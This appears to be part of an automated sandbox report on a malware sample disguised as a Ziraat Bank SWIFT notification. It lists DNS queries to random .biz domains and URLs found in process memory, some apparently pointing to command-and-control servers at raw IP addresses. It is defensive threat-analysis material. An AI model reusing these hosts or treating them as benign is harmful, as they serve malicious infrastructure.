Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:24 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:24 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 21 Mar 2025 14:10:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Source: niellist.exe, 00000011.00000002.1411628662.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.21
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/
Source: niellist.exe, 00000003.00000002.1298601630.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/2X
Source: alg.exe, 00000002.00000003.1340496189.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/2m
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/bspqodujb
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/bspqodujbngs
Source: niellist.exe, 00000003.00000002.1298601630.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/eri
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvb
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvb588
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvbs
Source: alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340849614.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/twetxppkkq
Source: alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1558654635.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1770492535.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1346185101.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/twetxppkkqVt
Source: niellist.exe, 00000003.00000002.1294142638.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000003.00000002.1298601630.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/woywqgxcq
Source: alg.exe, 00000002.00000003.1300228185.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/bspqodujb~vZ
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/qnwbdottpdjvbY
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340849614.0000000000513000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/twetxppkkq
Source: niellist.exe, 00000003.00000002.1298601630.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/woywqgxcq
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/12
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/12E
Source: alg.exe, 00000002.00000003.1312913508.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1314920250.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/buysxojjpcbe
Source: alg.exe, 00000002.00000003.1313095660.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57:80/buysxojjpcbeP
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000003.00000002.1293879138.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000011.00000002.1410876293.0000000000A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/Ad
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/DM
Source: alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/E
Source: alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/a
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1273923400.0000000000D75000.00000040.00000020.00020000.00000000.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/ahfjecsqgekcwio
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1273923400.0000000000D75000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/ahfjecsqgekcwioro
Source: alg.exe, 00000002.00000003.1307290100.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1312913508.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1314920250.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/arkfkq
Source: niellist.exe, 00000003.00000002.1298601630.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/bwejhhjeahxfje
Source: alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/oqcvpoewhl
Source: alg.exe, 00000002.00000003.1279607006.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/oqcvpoewhl-v
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/rkfkq
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/ahfjecsqgekcwio
Source: alg.exe, 00000002.00000003.1307088264.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/arkfkq
Source: alg.exe, 00000002.00000003.1280251410.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/oqcvpoewhl
Source: alg.exe, 00000002.00000003.1559227442.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/uhxgrttve
Source: alg.exe, 00000002.00000003.1322367769.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1559227442.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/uhxgrttve
Source: alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/J
Source: alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/a
Source: alg.exe, 00000002.00000003.1559227442.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/gs
Source: alg.exe, 00000002.00000003.1770492535.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/iljywase
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/iljywasehv
Source: alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/kkjhdthfjo
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/kkjhdthfjouemm1$
Source: alg.exe, 00000002.00000003.1987338757.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/qlbvcaqfgtptt
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/qlbvcaqfgtpttqtS
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/iljywase
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/kkjhdthfjoP
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/qlbvcaqfgtpttcrobat
Source: powershell.exe, 0000000E.00000002.1464480139.000001FEBE977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microskW
Source: powershell.exe, 0000000E.00000002.1464480139.000001FEBE90C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 0000000E.00000002.1437482472.000001FEB6143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: niellist.exe, 00000003.00000002.1293879138.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA62FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: XClient.exe, 0000000B.00000002.2539294552.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1397307978.000001FEA60D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD84481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA62FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LR
